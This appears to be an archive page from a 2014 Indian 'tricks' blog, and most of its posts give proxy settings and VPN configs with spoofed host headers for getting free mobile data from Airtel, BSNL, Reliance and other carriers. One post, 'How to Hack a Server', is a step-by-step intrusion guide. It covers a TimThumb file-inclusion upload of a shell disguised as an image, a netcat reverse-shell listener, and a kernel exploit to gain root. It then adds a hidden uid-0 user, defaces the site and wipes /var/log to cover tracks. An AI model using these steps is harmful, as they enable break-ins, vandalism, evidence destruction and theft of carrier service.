Latest Posts
Showing posts with label Free 3g trick. Show all posts
Showing posts with label Free 3g trick. Show all posts

22 July 2014

Wechat Messenger Giving Free 50 Rs Recharge By Sending Message :D

Wechat+Tweakingtricks.jpg

Hey All Guys , many Of You Want Free Recharge :P , So We Are Back With This Post Called Wechat Messenger Giving Free 50 Rs Recharge . As You Know That Many Of Messengers Are Giving This Type Of Offer Also Line IS Giving But Its Take Time To Receive 130 Rs Its Takes 25 Days :P , But Wechat Is Giving In Just 48 Hrs That's Cool , Just You Need To Follow The Simple Steps :)  . Also Check Our Get Free 130 Rs By Downloading Line App . You WIll Receive That 50 Rs Recharge Redeem Links In Just 48 Hours :)




How To Get This Amazing Deal :D 
  • First  Download Wechat :- Click Here
  • Now Register If You Don't Have Account  Or If You Have Just Sign In :D
  • After That Send Any Message To Your Friend You Can Send Him :- messages /Audio / Video/Emoticon Any Of Them .
  • After All Doing This You Will Get Your 50 Rs Recharge Redeem Link In Within 48 Hours :)
Read more ...

04 July 2014

How to Hack a Server

Tutorial on Web Hacking by 4n0nkh4n

Web-Hacking is my favorite topic that I could easily discuss for hours.

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from here….)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (google it or contact us)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking.
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix . Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png(instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com(or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
Read more ...

07 May 2014

Unlimited Calling Trick

Today we give onther Free calling method for android phone users.And main benifit of this the voice quality is amazing, when you talk you feel that you are talking normaly as you usually do. And caller see your number when recive call not company number.So you can use easily without telling any one that you are using app. Firstly Libon app gives you 60 minutes per month for free calling Per id untill july .when your 60 minutes over create new Id and again enjoy.You can try this method as much as you want. For using this Trick you have to download This app from Below link From your android phone.
• Download Libon Free Calling App [Android]
• Download Libon Free Calling App [Iphone]
Capture 1
SO read some Official and Features of this app.
• Join LIBON Now
• Get 60 Free Minutes Per Month During 3 Months
• Call More Than 90 Countries: India, Asia, Europe, North and South America, Africa, and many more!
• Discover the 50 new destinations that you can call with Libon Out! Download the app to see more.
• Free chat with everyone! Really EVERYONE! Your contacts don’t even have to be Libon members.
• Send instant messages, pictures, audio messages and so much more to all your contacts!
• In UK, some Vodafone subscriptions are not compatible with Libon.
Read more ...

Unblock Your Airtel Sim Card Via Facebook Night Pack 2014

Hello Guys, Welcome Back Today we share with you Latest AirTel SIM Unblocking trick. If you are using free net then mostly sim gprs is blocked so you are not able to use free net. If you are New then we are going to tell exactly what is sim blocking and how u unblock it.

What is SIM Blocking..?
When you'll not be able to use any free internet trick, not even the most basic trick, i.e., proxy trick then your sim is blocked.

To confirm try to open free homepage like airtellive.com if it doesn't open and shows an error msg that means your sim is blocked for free internet.

Ok hope you understand what is sim blocking Now it's a problem and if it is happen we are not able to use free net. So we have also solution for this problem Bcz every questions has answers

This trick is based on latest Unlimited Facebook offer from Airtel.

Steps To Follow-
1. Activate Facebook Night Pack by dialing *129#. You'll be charge just Re. 1 .

2. During 12 AM to 6 AM do not try to use any trick. Only surf facebook with default airtel internet setting.

3. Switch off mobile and then open airtellive.com for 3-4 times.

4. If airtellive page doesn't open then surf fb again for few minutes and on the next day your sim will get unblocked.

Note: This trick is tested at Rajasthan & Haryana.
Trick is collected from different source.

Read more ...

29 March 2014

BSNL DIRECT UNLIMITED TRICK

Presenting new BSNL Direct trick.

In this post i m posting new BSNL trick working directly....

After confirming this from my friend i have been posting this.....

Sorry to tell you that this trick is working only in some states....

I have posted this trick in survey because it is premium trick and to save this trick from blocking and would probably work for longer time.
After the blocking of BSNL BBM trick this is the latest working trick so called BSNL DIRECT TRICK.
For your ease to get this trick i have posted Fileice Survey Completing trick.

Link of tutorial- http://alldownhack.blogspot.in/2014/03/latest-fileice-tutorial-detailed.html


Features-

1. Working at Hi-Speed.
2. No Disconnection at all.
3. No need of any Software or anything.
4. Torrent Clients Supported.


The trick is under here--



Now enjoy this trick fully before it gets blocked :)
Read more ...

27 March 2014

BSNL BBM SOLUTION



BBM Not Working??? Try This it Works 100% Sure
Now enjoy BSNL BBM again.
I have found this solution from somewhere else earlier but was not able to post till now.
Many of the users were using bsnl bbm trick till now and resulted in the blockage of this trick.
Here is the new way for using this awesome trick again.


Read all the steps carefully-

Step 1- Connect with bsnlnet apn.

Download This For Full Instructions

Some Notes--
1. You can use older versions of mobile partner as it allows quicker shift from one apn to another.
2. You can try this trick by replacing bsnlnet with other apns like stream apns,mms,etc.
Read more ...

Airtel New Working Configurations [No Survey]

I m posting these configs without making too late.....
These configurations were made by me about 3 weeks ago and these are working till now.
Now you can also enjoy free 3G with the help of these configurations.
I have posted this configurations openly like before. Its a humble request to other bloggers that please don't copy paste articles from here and make your own.

Now lets head to the trick....



Requirements--

1. 3G enabled sim. Can be used in 2G sim.
2. Use with 0 balance.
3. Small 3G plan activated.

Features of this trick--

1. First on Net...As it is made exclusively by me.
2. High-Limit.
3. Working with Hi-Speed browsing and downloading.
4. Can be used in Androids using OpenVPN.
5. Based on VPNBOOK Servers.
6. Working from last 3 weeks.
7. Can be used with Connectify for more speed.
8. Made with Premium Proxies.
9. Working states- Rajasthan, Delhi, Gujarat, UP East, Maharastra, and other state users try for yourself.
10. No disconnection at all.

How to use--

For using in PC/Laptops use NMDVPN or you can get the best vpn service uploaded in the link below-
For using in Androids use OpenVPN for android. You can get that either from playstore or from the link below-

Ways for Avoiding Sim Blockage--

1. Use with small 3G plan.
2. Don't use social sites like facebook,youtube, etc much. You can use social site but use for little time.
3. Keep equal intervals of data usage. Don't use much data in one session.
4. Avoid downloading bigger size file.

<--Download Links-->

Thank you for watching this post. Please take a minute or two for liking/commenting our post.
If you like my work you can also join our facebook page.
Keep visiting daily for new posts... Soon will be uploading fileice trick and new stuffs.
Next article from my blog members will be coming.
Read more ...

26 March 2014

Idea To Idea Call Rate Reducing Trick 100% Working March-April 2014

NO BULLSHIT INTRO


Direct To The Point

 

Download Instruction File From Here



Read more ...

!dea BBM Trick Revealed March 2014

Hey guyss How are you all today???


Presenting !dea TCP Trick Only For Few States


Small ** Rupees Pack Required 


Speed You know Of TCP


Download File From Here




Read more ...

Reliance 3G Unlimited Trick March - April 2014 Totally Hacked:

Features:-
*Full High Speed 3G.
*Need a Small 3G Recharge.
*No Disconnecting Problem.
*High Speed Download And Browsing.
*No Speed Capping.
*Torrent Download Supported.
*Secure Connection.
*HTTP And HTTPS Supported.

    USE APN - rcomwap Or smartwap
How to use this Trick:-
1.First of all Download the Below given Trick File where you will get all information and file and then download NMD VPN if you dont have.
then Download NMDVPN

2.Now simply install NMD VPN. If Already Installed Then Skip This Step.
3.Now Copy All Config Files And Paste Them Into VPN Configs Directory Of NMD VPN (C:\Program Files\NMDVPN\config)
4.Now Connect Your Internet And Then - Right Click On NMD VPN Icon In Desktop And Run as Admin.
5.After That - From System Tray Icon Connect Your Net With Your Config. You Get Connect.


DOWNLOAD THE TRICK HERE
Read more ...

Airtel Free Internet via Uc browser 26 march 2014

Hi friends Today I want to share a Airtel Free Internet trick Via UC Browser and opera mini  For Airtel with the help of new Proxy and Frontquery.If you know how to change proxy and frontquery of your mobile then u will get the full benefit of this trick.
IF you like the post then plz like the facebookpage for new updates any time .
and plz don't disturb me if you don't know how to set proxy and frontquery in your phone
Create the following settings in ur mobile......
Apn= airtelgprs.com
port=80
proxy= 91.235.40.75
frontquery= 203.115.112.5/.pl/id/shield/http/

download limit is 100mb per day.....

Enjoyyy...
Read more ...

24 March 2014

Airtel FREE SMS Trick 2014

 

 

 

Features:-

*Message Delivery Within 10

Seconds (Max 1 min)y

*Not An Operator Based Trick

*24x7 Message Sending Power

*No Need Of Internet Or Any App

 

 

Download it From Here

 

Any Problem????? comment here.


Read more ...

Tata Docomo Free Gprs Trick march 2014

http://www.tricklike.blogspot.com
          

Hi friend Today I Am Again Back With Tata Docomo Free Gprs Trick  january  2014  only get 20-25 kbps in my idea 199rs. unlimited peck. then i test this proxy in docomo sim without any gprs data balance. this proxy very fine work in my docomo sim with 419kbps speed without any main balance or gprs data plan


Features of new tata docomo unlimited proxy tricks:-
*unlimited gprs
*high-speed download and
upload
*both work mobile-pc
*no balance deduction
*tested in docomo-idea sim

How to config. in mobile:-
*first create new profile in your mobile
*Name all updated tricks
*APN tata:docomo internet
*Proxy:128.20.210.02
*Port:80 or 8080
*Homepage:google.co.in

save and restart your mobile devices it done
Thanks...
Read more ...

Airtel New Latest 5 Time Faster Superfast Proxy March 2014


Hiiiiiiiiiiiiiiiiiiiiiii friends i am Back Again with 5 Time Faster Cgi Perl Proxy You can use this proxy in any mobile handler it will work fine and fast too.
recommend browser is ucweb handler bcz ucweb is one of the most lightwieght and fastet browser in the world for mobile devices...

java/android users can use this trick easily symbain users also but on java platform so here is the trick which is working 100% all over india

(1)ip
*Proxy: 5.231.80.223
*Port:- 80
*Front Query For Handlers:
203.115.112.27/airtel-sh/nph-surf.pl/en/C0/http/tricklike.in
Replace 203.115.112.27 with your working free host in your state
(2) ip

*Proxy : 5.231.80.220
*Port:  80
*Front Query For Handlers:-
203.115.112.27/airtel-usr/nph-surf.pl/en/C0/http/
(3) ip

*Proxy: 5.231.71.145
*Port: 80
*Front Query For Handlers:
203.115.112.27/cgi-bin/nph-prox.pl/en/C0/http/tricklike.in

Thanks.....
Read more ...

23 March 2014

BSNL NEW UDP TRICK APRIL 2014








 Hello , All
Presenting all new BSNL UDP Trick for you its a new trick on web can't say 1st on net but yes i have personally tested on my BSNL 3G Sim card and found working like a charm so you can take a deep breath and use this bsnl 3g udp trick unlimited without fear of loosing you hard money this time on bsnl 3g udp trick , many of you were asking for bsnl 3g has speed capping on bsnl 3g free udp trick ,but i am providing you a new vpn for using bsnl 3g udp free internet/gprs trick in which your bsnl 3g sim card will not be capped and you will be getting a constant high speed 3g internet trick.

This Bsnl 3g udp trick is based on UDP [User Defined Port] as the title says, just providing info in case you dont haev knowledge about this and also for newbies who are new to operator tricking :)

Moreover we have already shared reliance tcp 3g vpn free internet trick with you you can find that in below of the this bsnl 3g udp trick for feb march 2014,  we have done some modifications on reliance 3g tcp based trick some of them are we have solved disconnection issue , balance deduction issue , and the main part of the reliance 3gvpn trick is SPEED we have managed to increase that too, just download that reliance 3g vpn trick  attachment file and enjoy unlimited free 3g internet/ gprs tricks.
More tricks such as Aircel 3g , Idea 3g , VOdafone 3g , Tata Docomo 3g Free Intenet tricks can be founf on our blog just use our advance search tab to find the trick which suits you the best :P.

Requirement For this BSNL 3G Vpn Trick


  1. BSNL 3G Enabled Sim card
  2. Maintain main balance of Rs. 0 , Pack Required .
  3. Apn:Check Attachment :)
  4. Speed Up to More than 500 KBps :D In 7.2 Mbps Modem
  5. Enough for this trick
Features of BSNL 3G UDP Vpn Trick


  1. Unlimited Download.
  2. No speed capping.
  3. High speed.
  4. Torrent Supported.
  5. Disconnection Free .


How To use this BSNL 3G UDP Vpn Trick 

For Mobile users:  Android mobile use can also use these BSNL 3G Trick configs  with their android devices just you need to follow these simple steps :
  1. Download and extract config in SD card.
  2. Go to Google Play Store Search for open vpn for android. Or Click Here
  3. Install Open Vpn in you android device.
  4. Add BSNL UDP 3G Vpn Config to open Vpn folder.
  5. Run and Enjoy  :)
For PC Users:
1.Download The Attachment of BSNL UDP 3G Trick.
2.Install Nmdvpn and Put configs Here (C:\Program Files\NMDVPN\config)
3.Windows 7 and Windows 8 Users RUN NMD VPN as the Administrator.
4.Just Connect and Enjoy.



DOWNLOAD CONFIG HERE
Read more ...

StoutVPN

StoutVPN v1.1b
Requirements
 computer (Windows OS)
Windows XP/Vista/7/8 (64bit/32bit)
internet connection (some case internet access is unnecessary)

Features
HSS servers elite Register Here! also check there for more info about "Elite"
capable to use TCP/UDP
Add/Remove server
Auto-FlushDNS
Built-in pinger
Automatic driver installing
Auto save settings
Compatible on 32-bit and 64-bit OS

About 
StoutVPN Is Hotspot Shield VPN Portable Software And Work Easy
With Many Features
And 
About RamHSS
RamHSS Is Also Hotspot Shield VPN Portable Software
And Work Very Easy
No Driver Problen  
With Adblock 

RamHSS=StoutVPN=Hotspot Shield
Software By Hidden Hack Forever Team

Read more ...

22 March 2014

Reliance 3G Hack With Premium Proxy



FREE
Only For Panjab, Delhi, Bihaar, Chhattisgarh, Jharkhand, And MP 
Working All States
Work With Little 3G Plan
Try APN
rcomwap
smartwap
rcomnet
smartnet
-High Speed
With New High Speed Premium Proxy
No Disconnect Problem


After Download 1st See How To Work Folder
Follow All Step And Enjoy
-------------------------------------------------------------
In This Case RamVPN Not Work For U
So Please Change Password From www.vpnbook.com
-------------------------------------------------------------

Read more ...

BSNL 3G Hack With UDP VPN For All Over INDIA Confirm


FREE


 RamVPN Hotspot Shield Setup 2014
For All UDP Port
Edit Config With Notepad And Change 
lport xx To lport [Your Open UDP Port]
Features
Auto Adblock [Off Antivirus On Install Time]
Automatic Detect And Install Driver
Both Tap And HSS Driver With Adblock
Working Windows 8.1 , 8 ,7 And XP

Always Run RamVPN As Administrator
All Working Server
Read more ...

[BANG]Make Your Own Trick For All Networks For Pc And Android[With VPN]

Most Part Of Networks Trick
1- Host 
2- VPN
3- Https Proxy
-----------------------------------------------------------------------------------
About
1-Host 
Host Is A Free Websites Of Network
Like- In Airtel Free Open airtellive.com
Now Our Host Is airtellive.com 
-----------------------------------------------------------------------------------
2- VPN[Virtual private network]
VPN Work For Security 
And VPN To Access Blocked Websites
VPN Type
1-UDP [ Fast VPN Servers]
1-TCP [Normal VPN Servers]
VPN Port
UDP- 9201, 9200,53
TCP- 443, 137, 80
VPN Config
Config Most Part Of VPN
Config File Type [.ovpn]
We Can Edit config With Notpad
-----------------------------------------------------------------------------------
3- Https Proxy
Https Proxy Part Of TCP VPN
How It Work
Host Not Work With VPN
But Host Work With Https Proxy
So We Use Https Proxy With Host With VPN
Then VPN Work Free With Network

-----------------------------------------------------------------------------------
How To Make Trick 
Now We Make Free Config For Airtel
Now Our Host airtellive.com 
Https Proxy - 81.25.172.105 Port- 3128
Now We Need VPN Config So We Use VPNBOOK Config
VPNBOOK Config After Edit Notepad
client
dev tun1
proto tcp
remote 93.115.84.195 443
resolv-retry infinite
nobind
persist-key
persist-tun
auth-user-pass vpnbook.txt   
comp-lzo
verb 3
cipher AES-128-CBC
fast-io
pull
route-delay 2
redirect-gateway
http-proxy 81.25.172.105 3128                                            [it's Https Proxy]
http-proxy-option EXT1 'Host:airtellive.com'                        [Host Line]
http-proxy-option EXT2 'X-Online-Host:airtellive.com'         [Host Line]


After Edit Host And Https Proxy Save It With .ovpn File Type
And Copy It And Paste RamVPN - data/config
You Can Use All VPN Config With RamVPN
No 1 Portable VPN
Easy And Work Fast
Working With Problem Less
NO Drivers Problem With Win 7 ,8 And XP And Other
Working NMD And OpenVPN Both Config
Manual Driver Option
No Tell U Uninstall Driver On Exit Time

 Manual Driver Option

Put Your Config In Config Folder
-----------------------------------------------------------------------------------
Now Our Tricks Based On Host
Q-How To Find Host
Ans-Networks Operator Give Time To Time Many Offers

Like-Facebook Free 1 Month
So Our Host Facebook.com

Like-Twitter Free 3 Month
So Our Host twitter.com/m.twitter.com

-----------------------------------------------------------------------------------
Note
1- Our Tricks Base On Host
2- TCP VPN With 443
3- 443 Is Always Open Port With All Network
-----------------------------------------------------------------------------------
After All Steps Our Trick

[FREE]
It's Work All Over INDIA
But Most Work In Rajasthan With 3G Speed At 0 Balance 
And Without Any 3G Plan
APN -airtelgprs.com
Balance - Zero

Please Don't Use After 150mb Per Day
Time You Can Use 150mb 
6am To 12am
Don't Use 12am To 6am
-----------------------------------------------------------------------------------
In This Case RamVPN Not Work For U
So Please Change Password From www.vpnbook.com
For More Help See How To Work Folder
-----------------------------------------------------------------------------------

-----------------------------------------------------------------------------------
For Android And Java

Airtel Facebook Offer 500MB Per Month
Any Way To You Can Use 500MB In A Month
After 500MB Sim Block
APN -airtelgprs
Homepage- m.facebook.com

For Android
Use Any Opera Handler And Uc Handler

Proxy Type- Real Host
Peoxy Server- m.facebook.com 
Only 500 MB Per/Month

-----------------------------------------------------------------------------------

For Java User
Use Any Opera Handler And Uc Handler
Proxy Type- Real Host
Peoxy Server- m.facebook.com
Only 500 MB Per/Month

-----------------------------------------------------------------------------------
Make Your Own Trick For All Networks For Pc And Android [Free Proxy Trick]


Most Part Of Networks Trick
1- Host 
2- Free Proxy
-----------------------------------------------------------------------------------

About
1-Host 
Host Is A Free Websites Of Network
Like- In Airtel Free Open airtellive.com
Now Our Host Is airtellive.com 
-----------------------------------------------------------------------------------
2- Free Proxy
Free Proxy To Access Blocked Websites
We Can Open Every Blocked Website With Free Proxy
Like - adf.ly Is Block In India So We Can Use
Free Proxy And Access adf.ly
Free Proxy Website
4everproxy.com
Kproxy.com
PirateBayProxy.co ( SSL Secure )
UnblockYoutube.co ( SSL Secure )
SSLSecureProxy.com ( SSL Secure )
HideIP.co ( SSL Secure )
YouTubeFreeProxy.com
HideThisIP.net
Blewpass.com
Hide-Me.org
FreeVideoProxy.com
45bytes.info 
66peers.info 
ablocker.info 
alazingo.com 
allsphere.info 
atoko.com 
atomicstudios.info 
awabo.com 
base33.info 
base99.com 
bblocker.info 
blink32.com 
A Lot Of Proxy Websites Are Available 
In World Wild Websites

-----------------------------------------------------------------------------------
How To Make Trick
Put Free Proxy In Mozila FileFox 
And Idm 
Like-



After Put Proxy Open Host Site In Browser
And Enjoy Free Net
----------------------------------------------------------------------------------
Now Free Net In Airtel
Host - airtellive.com
Proxy - 4everproxy.com Port 80 
Use Host Like Homepage
Read more ...
Designed By Published.. Blogger Templates